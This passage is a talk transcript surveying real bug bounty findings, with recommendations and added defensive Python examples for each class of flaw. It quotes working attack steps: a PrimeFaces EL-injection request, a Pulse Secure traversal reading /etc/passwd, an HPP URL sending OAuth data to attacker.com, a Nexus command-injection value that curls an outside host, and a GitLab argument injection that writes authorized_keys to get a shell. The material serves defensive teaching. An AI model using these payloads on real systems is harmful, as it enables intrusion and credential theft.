Security is hard. We all miss things. Attackers find things.
"You must learn from the mistakes of others. You can't possibly live long enough to make them all yourself." -Samuel Levenson
This talk is a fun, fast-moving survey of some of the best recent bug bounty finds against some of the largest and best-known applications in the world. Some of the bugs are really simple, some are super complex, but all are entertaining. As we go through these, we'll take a look at what caused the issue, and how to fix it.
From this talk, you'll walk away with:
* a few minutes of entertainment
* a view of the wide breadth of security issues
* practical ideas on testing and shoring up security in your own applications
* (maybe) a new side gig as a bug bounty hunter!
2. Me
• Director, Product Security & OWASP guy
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com
3. Agenda
• intro
• for each bug
• understand issue
• understand fix
• pointers to helpful tools
• wrap-up
4. Intro
• Security bugs are just bugs
• There are many types (714 weaknesses in CWE across 237 categories)
• They go by many names (frustratingly inconsistent)
• There is a wide range of complexity
• There is no such thing as a “top 10” for you (see ecological fallacy)
5. A few bugs …
• Account Takeover
• Direct Object Reference
• XXE
• XSS
• RCE
• OS Command Injection
• Subdomain Takeover
• CSRF
• SQL Injection
• Insecure 3rd party libraries
• Missing Access Control
• SSRF
• Parameter Pollution
• Privilege Escalation
• Insecure Configuration
• Deserialization
• Authentication Bypass
• Hardcoded Password
8. Insecure 3rd Party Libraries
“One of the DoD applications uses a Java library which is vulnerable to expression language injection. Using only a URL I was able to inject Java code. I made a simple PoC that requests a name resolution to a DNS server.
The application at https://███ uses Primefaces version 5.3 which is vulnerable to Expression Language injection through the DynamicContent generator.”
9. Insecure 3rd Party Libraries
“With the code attached generate the payload encrypted with the default key "primefaces". With the payload from #1, send a GET request using curl (curl -vk https://████/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=<YOUR_PAYLOAD_HERE>)”
10. Insecure 3rd Party Libraries
“You will receive a name resolution request for remoteMalJarUrl from the DoD application. We could use this DNS request to exfiltrate data from the server. And as I said, theoretically I could also delete files from the server using the File class.”
11. Insecure 3rd Party Libraries
Recommendations:
1. Update your libraries regularly! Even use auto-updaters where possible (requires test confidence)
2. Scan for known vulnerabilities (OWASP Dependency Check, Dependency Track)
3. Build a BOM (Dependency Track)
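Recommendations 2 and 3 come together once you have a BOM: the check is just "for each component, is its version inside a known-bad range?". The script below is an added example (not Dependency Track or Dependency Check code) that does exactly that over a CycloneDX-shaped BOM. The advisory entry, its identifier, the "fixed_in" version and the sample components are all constructed for illustration; the page only says that Primefaces 5.3 was vulnerable, so the fix version here is a placeholder.

```python
"""Cross-check a CycloneDX-style software bill of materials (BOM) against a
list of known-vulnerable version ranges.  Added example; the advisory list and
the sample BOM are constructed for illustration and are not a real feed."""
import json

# Constructed advisory entries: anything below fixed_in is treated as affected.
# A real feed (NVD, OSS Index, GitHub Advisory Database) carries proper ranges
# and identifiers; these values are placeholders, not the real PrimeFaces fix data.
ADVISORIES = [
    {"id": "EXAMPLE-0001", "group": "org.primefaces", "name": "primefaces",
     "fixed_in": "6.0", "summary": "EL injection via dynamic content (constructed entry)"},
]


def parse_version(text):
    """'5.3' -> (5, 3); non-numeric suffixes such as '-rc1' are ignored, which is
    adequate for the major.minor.patch scheme assumed here."""
    parts = []
    for piece in text.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_affected(version, fixed_in):
    """True when version sorts strictly below fixed_in (shorter tuples are padded with 0)."""
    a, b = parse_version(version), parse_version(fixed_in)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def check_bom(bom, advisories=ADVISORIES):
    """Return one finding per (component, advisory) pair that matches."""
    findings = []
    for comp in bom.get("components", []):
        for adv in advisories:
            same = comp.get("group") == adv["group"] and comp.get("name") == adv["name"]
            if same and is_affected(comp.get("version", "0"), adv["fixed_in"]):
                findings.append({"id": adv["id"], "group": comp["group"], "name": comp["name"],
                                 "version": comp["version"], "fixed_in": adv["fixed_in"]})
    return findings


# Constructed sample, shaped like CycloneDX JSON (bomFormat/components are real field names).
SAMPLE_BOM = json.loads("""{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.primefaces", "name": "primefaces", "version": "5.3"},
    {"type": "library", "group": "org.primefaces", "name": "primefaces", "version": "6.2"},
    {"type": "library", "group": "org.example", "name": "unrelated-lib", "version": "1.0.0"}
  ]
}""")

if __name__ == "__main__":
    for f in check_bom(SAMPLE_BOM):
        print(f"{f['id']}: {f['group']}:{f['name']}@{f['version']} (fixed in {f['fixed_in']})")
```

The point of owning the BOM is that this loop can run in CI on every build, against a feed you refresh daily, instead of waiting for a bounty report to tell you which version you shipped.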
14. Privilege Escalation
“Because of the lack of security, an attacker will be able to remove the original log file and replace it with a symlink to another file.
After finishing the job, the host machine copies the file from the docker container.
Because the original log file has been removed, the host machine will copy the symlink file. But the problem is it doesn't copy the linked file in the container, it copies the linked file on the HOST MACHINE.”
17. Privilege Escalation
Recommendations:
• “We're currently in the process of deploying a remediation involving removing symlinks from data uploaded from the worker.”
• Sandbox sensitive processes
• Monitor logs
• Understand technology choices (docker reading from host)
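The vendor's remediation ("remove symlinks from data uploaded from the worker") is easy to get subtly wrong, because the copy routine on the host is what must refuse to follow links, not the container. The following is an added example (not the vendor's code) of a host-side copy that walks the worker's output directory, skips every symlink it meets, and reports them; the demo() function builds a constructed scenario with a planted link so the behaviour can be seen without a container.

```python
"""Copy job output produced inside an untrusted container back to the host
without ever dereferencing a symbolic link.  Added example illustrating the
'remove symlinks from worker data' remediation; not the vendor's code."""
import os
import shutil
import tempfile


def copy_tree_no_symlinks(src, dst):
    """Copy regular files from src into dst, mirroring the directory layout.
    Symlinks (to files or directories) are skipped and returned instead of
    followed, so a link planted in the container cannot point the host at its
    own /etc/shadow or any other host-side file."""
    rejected = []
    for root, dirs, files in os.walk(src, followlinks=False):
        rel = os.path.relpath(root, src)
        target_dir = dst if rel == "." else os.path.join(dst, rel)
        os.makedirs(target_dir, exist_ok=True)
        # Prune symlinked directories in place so os.walk never descends into them.
        for name in list(dirs):
            if os.path.islink(os.path.join(root, name)):
                rejected.append(os.path.join(root, name))
                dirs.remove(name)
        for name in files:
            path = os.path.join(root, name)
            if os.path.islink(path):
                rejected.append(path)
                continue
            # follow_symlinks=False: if the entry turned into a link between the
            # check and the copy, copyfile recreates a link rather than reading
            # through it (a snapshot or open-by-fd is the stricter answer).
            shutil.copyfile(path, os.path.join(target_dir, name), follow_symlinks=False)
    return rejected


def demo():
    """Constructed scenario: the worker wrote build.log but replaced job.log
    with a symlink to a host-only file and added a linked directory.
    Returns (copied names, rejected names)."""
    host = tempfile.mkdtemp(prefix="host-")
    secret = os.path.join(host, "host-secret.txt")
    with open(secret, "w") as fh:
        fh.write("host-only data\n")
    worker = tempfile.mkdtemp(prefix="worker-")
    with open(os.path.join(worker, "build.log"), "w") as fh:
        fh.write("build ok\n")
    os.symlink(secret, os.path.join(worker, "job.log"))      # the planted link
    os.symlink(host, os.path.join(worker, "artifacts"))      # a linked directory
    out = tempfile.mkdtemp(prefix="out-")
    rejected = copy_tree_no_symlinks(worker, out)
    return sorted(os.listdir(out)), sorted(os.path.basename(p) for p in rejected)


if __name__ == "__main__":
    print(demo())
```

The rejected list is worth logging (recommendation "Monitor logs"): a worker that produces symlinks where it should produce log files is itself a signal.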
22. CSRF
“The POST request to /ocs/v2.php/apps/provisioning_api/api/v1/config/apps/core/encryption_enabled is missing a unique token, so that if an attacker can trick an admin user with an active session into visiting an attacker-controlled website, he/she can control the core application setting "encryption_enabled".”
24. CSRF
“We are going to prevent this, but since you can not abuse it really without being an admin, and at that point you can also revert our patch, it's not eligible for a bounty.”
30. SSRF
“By sending a malformed HTTP request to alerts.newrelic.com, it's possible to trick that server into routing the request to an arbitrary location. This can be exploited by an internet based attacker to access internal services - doing a quick scan of █████████ I was able to access █████ etc.”
33. SSRF
“This code may look faultless - it takes the user-supplied URL, replaces the domain with the hard-coded backend server's address, and passes it along. Unfortunately the Apache HttpComponents server library failed to require that paths start with '/'. This meant that when I sent the following request: ”
The code above rewrote this request as http://public-backend@burp-collaborator.net/ and routed the request to burp-collaborator.net.
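The mechanism deserves spelling out: "replace the domain" was implemented as string concatenation, so a "path" that did not begin with '/' could contribute an '@' and turn the hard-coded host into the userinfo part of the URL. The code below is an added example (not the New Relic code) that puts the fragile concatenation beside a rewrite that parses the incoming URL, keeps only its path and query, and rebuilds it on a fixed authority; "public-backend" is the placeholder host name from the write-up, and effective_host shows where an HTTP client would actually connect.

```python
"""Rewrite a client-supplied URL onto a fixed backend host.  Added example,
not the New Relic code: a fragile string-concatenation rewrite beside one
that rebuilds the URL from parsed parts.  'public-backend' is the placeholder
host name used in the write-up."""
from urllib.parse import urlsplit, urlunsplit

BACKEND = "public-backend"


def rewrite_by_concatenation(user_path):
    """Fragile: glue the backend host onto whatever the client sent.  When the
    client's 'path' does not begin with '/', an '@' inside it turns the backend
    name into the userinfo field and the real host becomes attacker-chosen."""
    return "http://" + BACKEND + user_path


def rewrite_by_parsing(user_url):
    """Safe: parse, keep only path and query, force a leading '/', and rebuild
    with a fixed scheme and authority.  A final parse confirms nothing the
    client sent reached the host, userinfo or port fields."""
    parts = urlsplit(user_url)
    path = parts.path if parts.path.startswith("/") else "/" + parts.path
    rebuilt = urlunsplit(("http", BACKEND, path, parts.query, ""))
    check = urlsplit(rebuilt)
    if check.hostname != BACKEND or check.username is not None or check.port is not None:
        raise ValueError("rewrite produced a foreign authority: " + rebuilt)
    return rebuilt


def effective_host(url):
    """Where an HTTP client would actually connect for this URL."""
    return urlsplit(url).hostname


if __name__ == "__main__":
    sample = "@burp-collaborator.net/"          # the shape of the reported request
    print("concatenation ->", effective_host(rewrite_by_concatenation(sample)))
    print("parsing       ->", effective_host(rewrite_by_parsing(sample)))
```

The closing self-check is cheap insurance: even if a future parser quirk lets something odd into the path, the rewrite refuses to hand a request to any authority other than the one you hard-coded.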
41. File Disclosure
“CVE-2019-11510 is a file disclosure due to some normalization issues in Pulse Secure. I was able to reproduce this by grabbing /etc/passwd.
https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#”
42. File Disclosure
“The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear text passwords and usernames; when a user logs in from here we can then access the Pulse Secure instance.”
43. File Disclosure
Recommendations:
• When doing file operations, always start with a secure prefix
• Use whitelisted options where possible
• Normalize (canonicalize) input otherwise, being careful to do full input validation (length, type, encoding, semantic value, etc.)
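The three recommendations compose into one routine: decode, strip anything that is not part of the path, canonicalize, then compare the result against the canonical base directory. The code below is an added example (not Pulse Secure's code) of that routine; the base directory is a constructed value, TRAVERSAL is the request string from the earlier slide, and naive_contains_check only approximates the kind of substring test that a '?' suffix defeats.

```python
"""Resolve a client-supplied path under a fixed base directory and refuse
anything that escapes it.  Added example, not Pulse Secure's code; the base
directory is a constructed value and naive_contains_check approximates the
kind of substring test that traversal strings defeat."""
import os
from urllib.parse import unquote

BASE = "/srv/www/html5acc"                       # constructed document root
REQUIRED_PREFIX = "/dana/html5acc/guacamole/"     # the path segment from the write-up


def naive_contains_check(raw_path):
    """Approximation of a flawed check: 'does the request mention the allowed
    directory?'  The traversal string on the previous slide satisfies it
    because the required text appears after the '?'."""
    return REQUIRED_PREFIX in raw_path


def safe_resolve(base_dir, raw_path):
    """Return the canonical absolute path for raw_path inside base_dir, or
    None if it would escape.  Order matters: decode first, drop query and
    fragment, then canonicalize, then compare against the canonical base."""
    if "\x00" in raw_path:
        return None
    decoded = unquote(raw_path)                          # %2e%2e -> ..
    decoded = decoded.split("?", 1)[0].split("#", 1)[0]  # never let ?/# hide a suffix
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


TRAVERSAL = "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#"

if __name__ == "__main__":
    print("naive check passes:", naive_contains_check(TRAVERSAL))
    print("safe resolve:", safe_resolve(BASE, TRAVERSAL))
    print("safe resolve:", safe_resolve(BASE, "guacamole/index.html"))
```

The prefix comparison uses base + os.sep on purpose: a plain startswith(base) would accept a sibling directory such as /srv/www/html5acc-old.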
48. Insufficient Authorization
“For public projects, GitLab allows restricting CI pipelines to project members only (public pipelines disabled). However, in this case, the merge request widget still renders the scanning report results, which are the outcome of a CI pipeline.
Unauthorized users have access to critical information like the container scanning or dependency scanning report, and thus have a lot of insight into an application. By knowing the found vulnerabilities (or still existing ones), they could attack the target application.”
49. Insufficient Authorization
“Create a public project, restrict CI pipeline access to project members, and disable public pipelines.
Push a new branch and add a .gitlab-ci.yml file, and create a merge request with those changes.
As an unauthorized user, visit the page https://example.gitlab.com/<namespace>/<public-project-name>/merge_requests/1/merge_requests/1/container_scanning_reports and https://example.gitlab.com/<namespace>/<public-project-name>/merge_requests/1/merge_requests/1/dependency_scanning_reports”
55. Subdomain Takeover
1. Buy a domain at a hosting site (123xyz.hosting.com)
2. Get a vanity domain (2017event.mysite.com)
3. Create a CNAME record for vanity -> hosting
4. Hosting site expires (not needed anymore), but the CNAME is still there
5. Attacker registers the hosting domain
6. Vanity domain now points to the attacker's site
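Step 4 is the one a defender can catch: a CNAME in your own zone whose target no longer resolves. The script below is an added example (not a tool from the talk) of that audit over a zone export. The zone records and the canned resolver answers are constructed so it runs offline; live_resolves is the production variant that asks the system resolver; and the list of "claimable" suffixes is an assumption seeded from the two hosting services named in the write-ups that follow, to be maintained from your own providers' documentation.

```python
"""Find dangling CNAME records in a zone export: names you still publish whose
target no longer resolves.  Added example, not a tool from the talk; the zone
and the canned resolver answers are constructed so it runs offline, and the
'claimable' suffix list is an assumption seeded from the two hosting services
named in the write-ups."""
import socket

# Constructed zone export: (owner, type, target)
ZONE = [
    ("www.example.com.", "A", "203.0.113.10"),
    ("2017event.example.com.", "CNAME", "123xyz.hosting.example."),
    ("blog.example.com.", "CNAME", "blog-host.hosting.example."),
    ("legacy.example.com.", "CNAME", "legacy-app.azurewebsites.net."),
]

# Constructed resolver answers for the targets above (True = resolves).
CANNED = {"blog-host.hosting.example.": True,
          "123xyz.hosting.example.": False,
          "legacy-app.azurewebsites.net.": False}

# Suffixes where an unclaimed name can be registered by anyone; keep this list
# maintained from your providers' documentation.  Seeded from the write-ups.
CLAIMABLE_SUFFIXES = (".azurewebsites.net.", ".cloudapp.net.")


def canned_resolves(name):
    return CANNED.get(name, False)


def live_resolves(name):
    """Production variant: ask the system resolver; NXDOMAIN or no data -> False."""
    try:
        socket.getaddrinfo(name.rstrip("."), None)
        return True
    except socket.gaierror:
        return False


def find_dangling_cnames(zone, resolves=canned_resolves):
    """Return (owner, target, severity) for every CNAME whose target does not
    resolve.  Severity is 'high' when the target sits under a suffix where the
    name could simply be re-registered, 'review' otherwise."""
    findings = []
    for owner, rtype, target in zone:
        if rtype != "CNAME" or resolves(target):
            continue
        severity = "high" if target.endswith(CLAIMABLE_SUFFIXES) else "review"
        findings.append((owner, target, severity))
    return findings


if __name__ == "__main__":
    for owner, target, severity in find_dangling_cnames(ZONE):
        print(f"[{severity}] {owner} -> {target}")
```

Run it from the zone export rather than from a crawl of your website: the records that bite are exactly the ones nobody links to any more. Pair it with the process fix, which is to delete the CNAME as part of decommissioning the hosted service.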
56. Subdomain Takeover
“The dangling CNAME record of datacafe-cert.starbucks.com is pointing to s00397nasv101-datacafe-cert.azurewebsites.net which was not claimed by you. I registered a service with this name and therefore was able to take over the subdomain. Every attacker doing this has afterwards full control over the contents served on this subdomain.”
57. Subdomain Takeover
1. Using dig, I was able to determine that the subdomain 'd02-1-ag.productioncontroller.starbucks.com' was vulnerable to takeover. The record showed status: NXDOMAIN and was pointing to the CNAME: 3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net.
2. Using this information, I was able to create a new Azure Cloud Service with the name '3edbac0a-5c43-428a-b451-a5eb268f888b'. This would resolve to the CNAME record mentioned above.
3. I then crafted a website and uploaded it to the cloud service using this as a guide: https://docs.microsoft.com/en-us/azure/cloud-services/cloud-services-how-to-create-deploy-portal.
4. I was then able to view the uploaded site at http://d02-1-ag.productioncontroller.starbucks.com
63. Web Cache Poisoning
“On https://paypal.com/, you could impact core functionality by using an invalid Transfer-Encoding header to replace JavaScript files from www.paypalobjects.com with the message '501 Not Implemented'. This was patched and awarded a $9,700 bounty.”
71. Insecure Configuration
“The slack binary from the Linux desktop application is not a position independent executable:
$ file usr/lib/slack/slack
usr/lib/slack/slack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, stripped
(pie executables report either "LSB shared object" or "LSB pie executable".)”
72. Insecure Configuration
“Position independent executables are required for full ASLR support on Linux. Non-PIE binaries are loaded to a fixed location, thus allowing ROP attacks.
I'm aware that technically this is not a vulnerability, but a lack of a hardening feature. However, given that ASLR is generally considered standard practice these days and that lack of it can mean very simple bugs can directly lead to code execution, I think it deserves to be fixed.”
73. Insecure Configuration
“A simple memory corruption bug like a buffer overflow can easily lead to a remote code execution bug. With ASLR these bugs are much harder and sometimes impossible to exploit.”
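What file is reporting on the earlier slide is the e_type field of the ELF header: ET_EXEC binaries have fixed load addresses that ASLR cannot move, while PIE executables (and shared objects) are ET_DYN. The code below is an added example (not from the report) that reads that field directly, so the check can run in a release pipeline over every binary you ship; the two headers at the bottom are constructed minimal ELF images, not the Slack binary.

```python
"""Tell a fixed-address executable (ET_EXEC) from a relocatable one (ET_DYN)
by reading the ELF header, which is what 'file' is reporting on the previous
slide.  Added example, not from the report; the two headers at the bottom are
constructed minimal images, not the Slack binary."""
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3


def is_elf(data):
    """Enough bytes to hold e_ident plus e_type, and the right magic."""
    return len(data) >= 18 and data[:4] == ELF_MAGIC


def elf_type(data):
    """Return e_type from the first 18 bytes of an ELF image."""
    if not is_elf(data):
        raise ValueError("not an ELF image")
    endian = {1: "<", 2: ">"}.get(data[5])      # e_ident[EI_DATA]
    if endian is None:
        raise ValueError("unknown ELF data encoding")
    return struct.unpack(endian + "H", data[16:18])[0]


def is_position_independent(data):
    """ET_DYN can be loaded anywhere (PIE or shared object); ET_EXEC cannot be
    moved by ASLR.  Distinguishing a PIE from a library needs the dynamic
    section (DT_FLAGS_1 PIE) or the entry point, which this check skips."""
    return elf_type(data) == ET_DYN


def check_file(path):
    """Read just the header of an on-disk binary."""
    with open(path, "rb") as fh:
        return is_position_independent(fh.read(64))


def _constructed_header(e_type):
    """Minimal ELF64 little-endian header: magic, class=64-bit, LSB, version 1,
    SYSV ABI, padding, then e_type, e_machine=x86-64, e_version=1."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)
    return ident + struct.pack("<HHI", e_type, 0x3E, 1)


FIXED_ADDRESS_BINARY = _constructed_header(ET_EXEC)   # what 'LSB executable' means
RELOCATABLE_BINARY = _constructed_header(ET_DYN)      # 'LSB pie executable' / 'shared object'

if __name__ == "__main__":
    print("fixed-address:", not is_position_independent(FIXED_ADDRESS_BINARY))
    print("relocatable  :", is_position_independent(RELOCATABLE_BINARY))
```

A failing check here is a build-configuration bug (the linker was not told -pie, or the toolchain default was overridden), which is why the slide files it under insecure configuration rather than as a vulnerability.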
79. Insecure Configuration
“Nginx misconfiguration leading to direct PHP source code download
data.gov uses nginx as the web server. Due to the server misconfiguration, instead of processing the file, the .php source code is sent to the client requesting it from the direct URL.”
80. Insecure Configuration
“An attacker can download any .php file on the web, leading to a huge amount of information about the server. data.gov implements SAML (open-source); the config.php file in the SAML config folder can be downloaded by a direct URL request. It contains sensitive information such as: auth.adminpassword, technical contact email, and (possibly) database password.”
81. Insecure Configuration
Recommendations:
• Make sure to enable secure default configurations
• Use linters and scanners looking for bad configs (language / framework specific usually)
• If there’s a website, use active DAST scanners (ZAP, Burp, Arachni, etc.)
86. HPP
“I would like to report an issue on Digits web authentication which allows attackers to retrieve the OAuth credential data of an application victims authorized.”
“…the login page has 2 parameters, consumer_key and host. The former identifies which app a user wants to authenticate, and the latter specifies which domain the OAuth credential data is sent to after authentication. In order to prevent other websites from pretending to be the application, the host parameter will be validated to see if it matches the registered domain of the app.”
88. HPP
However, the validation can be bypassed with HPP (HTTP Parameter Pollution). If we supply multiple host parameters, the validation will only compare the first one, but the last one is used in the transfer step instead.
https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com
The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin.
90. HPP
Recommendations:
• Understand the way your language / framework / server handles multiple parameters of the same name
• Understand server and client side HPP
• Input validation for HPP (reject/report)
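The bug is a disagreement between two pieces of code about which of several equally named parameters "the" value is. The code below is an added example (not Digits' code) that replays the flow with Python's parse_qs, which keeps every duplicate in order: vulnerable_flow validates the first host and uses the last, hardened_flow refuses any duplicated parameter before it validates anything. ALLOWED_HOSTS stands in for the app's registered domain, and REPORTED_URL is the query string quoted on the HPP slide.

```python
"""How duplicated query parameters reach application code, with the
first-validated/last-used flow beside a version that refuses duplicates.
Added example, not Digits' code; ALLOWED_HOSTS stands in for the app's
registered domain, and the query string is the one quoted on the HPP slide."""
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"https://www.periscope.tv"}

REPORTED_URL = ("https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE"
                "&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com")


def values_of(query, name):
    """All values for a parameter, in order; parse_qs keeps every duplicate."""
    return parse_qs(query, keep_blank_values=True).get(name, [])


def vulnerable_flow(query):
    """Validates host[0] but hands host[-1] to the redirect step: the mismatch
    the report describes."""
    hosts = values_of(query, "host")
    if not hosts or hosts[0] not in ALLOWED_HOSTS:
        raise PermissionError("host not registered")
    return hosts[-1]


def hardened_flow(query):
    """Refuse any duplicated parameter before doing anything else, then validate
    the single value that will actually be used."""
    params = parse_qs(query, keep_blank_values=True)
    duplicates = sorted(k for k, v in params.items() if len(v) > 1)
    if duplicates:
        raise ValueError("duplicate parameters: " + ", ".join(duplicates))
    host = params.get("host", [None])[0]
    if host not in ALLOWED_HOSTS:
        raise PermissionError("host not registered")
    return host


def outcome(flow, url):
    """Run a flow and describe the result, for comparing the two side by side."""
    try:
        return ("redirect-to", flow(urlsplit(url).query))
    except (PermissionError, ValueError) as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print("vulnerable:", outcome(vulnerable_flow, REPORTED_URL))
    print("hardened  :", outcome(hardened_flow, REPORTED_URL))
```

The first recommendation matters because platforms disagree: PHP's $_GET keeps the last value, Flask's request.args.get() returns the first, and classic ASP.NET's Request.QueryString joins them with commas. Rejecting duplicates outright removes the disagreement instead of trying to remember it.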
95. Command Injection
“OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)”
“The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability.”
96. Command Injection
Take a look at the patch for CVE-2019-5475: https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84
The getCleanCommand method is not completely filtered and can still be bypassed.
97. Command Injection
Steps To Reproduce:
1. Navigate to "Capabilities" in Nexus Repository Manager.
2. Edit or create a new Yum: Configuration capability
3. Set path of "createrepo" or "mergerepo" to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)
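The lesson of a "clean command" method being bypassed twice is that filtering a string and then handing it to a shell is the wrong shape of fix. The code below is an added example (not the Nexus patch) of the allowlist shape: the configured tool path must be a plain absolute path, under a permitted directory, naming a permitted tool, and it is then executed as an argv list with shell=False so nothing is ever re-parsed. The allowed directories and tool names are assumptions.

```python
"""Accept an administrator-configured tool path only if it is a plain absolute
path to a known tool inside an allowed directory, then run it as an argv list
with no shell.  Added example of an allowlist approach, not the Nexus fix;
the allowed directories and tool names are assumptions."""
import os
import re
import subprocess

ALLOWED_DIRS = ("/usr/bin", "/usr/local/bin")
ALLOWED_TOOLS = {"createrepo", "mergerepo"}
# Absolute path made only of [A-Za-z0-9._/-]: no whitespace, quotes, $, {, }, ;, |, &.
PLAIN_ABSOLUTE_PATH = re.compile(r"^/[A-Za-z0-9._/-]+$")


def validate_tool_path(path):
    """Return the canonical path or raise ValueError.  The character allowlist
    fails first, so anything shell-like (including ${IFS} tricks) never reaches
    the filesystem or a process; realpath then defeats '..' and symlink games."""
    if not PLAIN_ABSOLUTE_PATH.match(path):
        raise ValueError("path contains characters outside the allowed set")
    canonical = os.path.realpath(path)
    if not any(canonical.startswith(d + "/") for d in ALLOWED_DIRS):
        raise ValueError("path is outside the allowed tool directories")
    if os.path.basename(canonical) not in ALLOWED_TOOLS:
        raise ValueError("unexpected tool name")
    return canonical


def is_acceptable_tool_path(path):
    """Boolean wrapper for configuration validation in a UI or a test."""
    try:
        validate_tool_path(path)
        return True
    except ValueError:
        return False


def build_command(tool_path, repo_dir):
    """argv list: each element is exactly one argument and nothing is re-parsed
    by a shell.  repo_dir may not look like an option, so it cannot become a
    flag for the tool either."""
    if repo_dir.startswith("-"):
        raise ValueError("repository path must not look like an option")
    return [validate_tool_path(tool_path), repo_dir]


def run_tool(tool_path, repo_dir):
    """shell=False is the point: the list goes straight to execve()."""
    return subprocess.run(build_command(tool_path, repo_dir), shell=False,
                          check=True, capture_output=True, text=True)


if __name__ == "__main__":
    for candidate in ("/usr/local/bin/createrepo",
                      "/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo",
                      "/usr/bin/../../bin/sh"):
        print(f"{candidate!r}: {'accepted' if is_acceptable_tool_path(candidate) else 'rejected'}")
```

Note what is not here: no attempt to strip or escape characters. A value either is a known tool or it is rejected, which is what makes the check stable against the next bypass.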
103. Hardcoded Key
“While going through GitHub search I discovered a public repository which contains a JumpCloud API Key of Starbucks.”
104. Hardcoded Key
POC:
List systems
curl -H "x-api-key: ████████" "https://console.jumpcloud.com/api/systems"
There are multiple AWS instances present
curl -H "x-api-key: █████" "https://console.jumpcloud.com/api/systemusers"
SSO Applications
curl -H "x-api-key: ██████" "https://console.jumpcloud.com/api/applications"
AWS login SAML config is present. This would lead to AWS account takeover
105. Hardcoded Key
This issue's impact is critical as through this API anyone could:
Execute commands on systems https://docs.jumpcloud.com/1.0/commands/create-a-command
Add/Remove users which have access to internal systems
AWS Account Takeover
106. Hardcoded Key
Recommendations:
• Don’t hardcode keys
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded passwords and keys (git-secrets, gitleaks, gitrob, trufflehog)
111. RCE
1. Create a new wiki page called page with the commit message controlled content
2. Search for the wiki blob via the Search API, with the injected ref flag: curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/5/search?scope=wiki_blobs&search=page&ref=--output=/tmp/file'
3. See that the file has been created:
git@gitlab-vm:~$ cat /tmp/file
commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9
Author:Administrator <admin@example.com>
Date: Wed Jul 24 13:08:51 2019 +0000
controlled content
112. RCE
1. Create a new rsa key
2. Create a new wiki page setting the commit message to the rsa public key
3. Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys
4. ssh into gitlab using the created key:
$ ssh git@gitlab-vm.local -i gitlab
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64)
$ id
uid=998(git) gid=998(git) groups=998(git)
$ cat /var/opt/gitlab/.ssh/authorized_keys
commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6
Author:Administrator <admin@example.com>
Date: Wed Jul 24 12:56:23 2019 +0000
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI/9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local
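This is argument injection rather than classic command injection: no shell is involved, but a "ref" beginning with "--" is read by git as an option, and --output sends git's own output to a file of the caller's choosing. The code below is an added example (not GitLab's code) of the two-part defence: validate the ref so it can never start with '-', and build the git argv so that anything user-controlled sits where git cannot read it as an option. The search command is a simplified stand-in for a server-side wiki search.

```python
"""Validate a client-supplied git ref before it becomes a command-line
argument, and keep it in a position where git cannot read it as an option.
Added example; the 'search' command below is a simplified stand-in for a
server-side wiki search and is not GitLab's code."""
import re
import subprocess

# Starts with an alphanumeric (so never '-'), then a conservative subset of the
# characters git permits in ref names.
REF_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]*$")


def validate_ref(ref):
    """Raise ValueError for anything that could be parsed as a flag (leading
    '-'), traverse ('..'), or break git's own ref rules (trailing '/', '.lock').
    For the authoritative check, run `git check-ref-format --allow-onelevel <ref>`."""
    if not REF_PATTERN.match(ref) or ".." in ref or ref.endswith("/") or ref.endswith(".lock"):
        raise ValueError(f"rejected ref: {ref!r}")
    return ref


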